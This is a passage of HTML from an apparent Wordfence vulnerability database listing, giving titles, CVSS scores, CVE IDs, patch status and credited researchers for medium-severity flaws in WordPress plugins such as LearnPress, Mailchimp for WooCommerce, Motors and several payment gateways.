		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba153e1-b46c-404d-81ec-21bc7dfa3d8a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1282482-3b41-423a-bff5-a82471fafc23" target="_blank" rel="noopener">LearnPress 4.4.3 &#8211; 4.4.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86446" target="_blank" rel="noopener noreferrer">							CVE-2026-86446						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nicat-sultanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bded93ac30db05695b969d802a1b2096.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bded93ac30db05695b969d802a1b2096"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nicat-sultanov" target="_blank" rel="noopener">Nicat Sultanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1282482-3b41-423a-bff5-a82471fafc23" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7955c993-e8e2-4afa-be15-5f4a05b391ac" target="_blank" rel="noopener">Mailchimp for WooCommerce &lt;= 6.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92435" target="_blank" rel="noopener noreferrer">							CVE-2026-92435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-woocommerce" target="_blank" rel="noopener">Mailchimp for WooCommerce</a> <span class="wfvr-software-slug">[mailchimp-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/194d5edb5df95ed8b7295c13d737c8c1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="194d5edb5df95ed8b7295c13d737c8c1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener">Francisco José Ramírez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7955c993-e8e2-4afa-be15-5f4a05b391ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c971731f-7fa1-4ea1-b3b3-3a991f575023" target="_blank" rel="noopener">Master Addons for Elementor &lt;= 3.1.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91015" target="_blank" rel="noopener noreferrer">							CVE-2026-91015						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-addons" target="_blank" rel="noopener">Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits</a> <span class="wfvr-software-slug">[master-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c971731f-7fa1-4ea1-b3b3-3a991f575023" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e99045c9-9417-4b84-92bf-a4aded6dc8bb" target="_blank" rel="noopener">Meow Gallery &lt;= 5.5.4 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92422" target="_blank" rel="noopener noreferrer">							CVE-2026-92422						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meow-gallery" target="_blank" rel="noopener">Meow Gallery</a> <span class="wfvr-software-slug">[meow-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e99045c9-9417-4b84-92bf-a4aded6dc8bb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c2ec7bc-713d-46a0-95a9-ac7ce35084c3" target="_blank" rel="noopener">MgoSync 2.1.5 &#8211; 2.1.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92404" target="_blank" rel="noopener noreferrer">							CVE-2026-92404						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/megamo" target="_blank" rel="noopener">MgoSync – European dropshipping and suppliers</a> <span class="wfvr-software-slug">[megamo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c2ec7bc-713d-46a0-95a9-ac7ce35084c3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/38d01b12-97ac-412b-b9df-c27118ce8f50" target="_blank" rel="noopener">Motors – Car Dealership &amp; Classified Listings &lt;= 1.4.120 &#8211; Missing Authorization to Unauthenticated Private/Draft/Password-Protected Listings Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16750" target="_blank" rel="noopener noreferrer">							CVE-2026-16750						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/motors-car-dealership-classified-listings" target="_blank" rel="noopener">Motors – Car Dealership &amp; Classified Listings Plugin</a> <span class="wfvr-software-slug">[motors-car-dealership-classified-listings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niv-kochan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/72bab04a62ba550220dbf14bbbc81dbd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72bab04a62ba550220dbf14bbbc81dbd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/niv-kochan" target="_blank" rel="noopener">Niv Kochan</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matan-bahar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/99e52acf5bb16bf6be6e9e6e79c599b4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99e52acf5bb16bf6be6e9e6e79c599b4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/matan-bahar" target="_blank" rel="noopener">Matan Bachar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/38d01b12-97ac-412b-b9df-c27118ce8f50" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d35a56e-2fc8-40b4-9796-b18e153993ae" target="_blank" rel="noopener">Motors &lt;= 1.4.120 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91016" target="_blank" rel="noopener noreferrer">							CVE-2026-91016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/motors-car-dealership-classified-listings" target="_blank" rel="noopener">Motors – Car Dealership &amp; Classified Listings Plugin</a> <span class="wfvr-software-slug">[motors-car-dealership-classified-listings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d35a56e-2fc8-40b4-9796-b18e153993ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a16379e-9f51-4cba-a477-a6aeaf5ba6f5" target="_blank" rel="noopener">Newsletter &lt;= 9.3.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86824" target="_blank" rel="noopener noreferrer">							CVE-2026-86824						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter-email-mailing-list" target="_blank" rel="noopener">Newsletter</a> <span class="wfvr-software-slug">[newsletter-email-mailing-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1a16379e-9f51-4cba-a477-a6aeaf5ba6f5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f8bcbe0-dc47-404d-b990-ce0448b69dcb" target="_blank" rel="noopener">Ni WooCommerce Sales Report &lt;= 4.1.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78474" target="_blank" rel="noopener noreferrer">							CVE-2026-78474						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ni-woocommerce-sales-report" target="_blank" rel="noopener">Ni WooCommerce Sales Report – Orders, Revenue &amp; Sales Analytics Dashboard</a> <span class="wfvr-software-slug">[ni-woocommerce-sales-report]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7f8bcbe0-dc47-404d-b990-ce0448b69dcb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22ab67a7-7b9a-407e-a41f-2245d1100e67" target="_blank" rel="noopener">Paid Member Subscriptions &lt;= 3.0.8 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90922" target="_blank" rel="noopener noreferrer">							CVE-2026-90922						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-member-subscriptions" target="_blank" rel="noopener">Paid Membership Subscriptions – Effortless Memberships, Recurring Payments &amp; Content Restriction</a> <span class="wfvr-software-slug">[paid-member-subscriptions]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22ab67a7-7b9a-407e-a41f-2245d1100e67" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae32cbbb-6903-44c7-9c54-82dadd2b4d9b" target="_blank" rel="noopener">Payment Gateway for PayPal on WooCommerce &lt;= 9.2.0 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92400" target="_blank" rel="noopener noreferrer">							CVE-2026-92400						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-paypal-gateway" target="_blank" rel="noopener">Payment Gateway for PayPal on WooCommerce</a> <span class="wfvr-software-slug">[woo-paypal-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae32cbbb-6903-44c7-9c54-82dadd2b4d9b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cef154c-efb8-4455-9be6-e3cf8b95e9d3" target="_blank" rel="noopener">Payment Gateway of Stripe for WooCommerce &lt;= 5.0.8 &#8211; Unauthenticated Improper Verification of Cryptographic Signature via woocommerce_api_wt_stripe Webhook Endpoint</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9832" target="_blank" rel="noopener noreferrer">							CVE-2026-9832						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payment-gateway-stripe-and-woocommerce-integration" target="_blank" rel="noopener">Payment Gateway of Stripe for WooCommerce</a> <span class="wfvr-software-slug">[payment-gateway-stripe-and-woocommerce-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pradeep-suvarna" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f546a55ea8a458c8a23c201bdf66f30a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f546a55ea8a458c8a23c201bdf66f30a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pradeep-suvarna" target="_blank" rel="noopener">pradeep suvarna</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cef154c-efb8-4455-9be6-e3cf8b95e9d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fbfd334c-dba4-49ec-b854-59e52236fe57" target="_blank" rel="noopener">Really Simple Security (Free) &lt;= 9.8.2 &#8211;  Unauthenticated Unbounded Option Growth</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88798" target="_blank" rel="noopener noreferrer">							CVE-2026-88798						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-ssl" target="_blank" rel="noopener">Really Simple Security – Simple and Performant Security (formerly Really Simple SSL)</a> <span class="wfvr-software-slug">[really-simple-ssl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
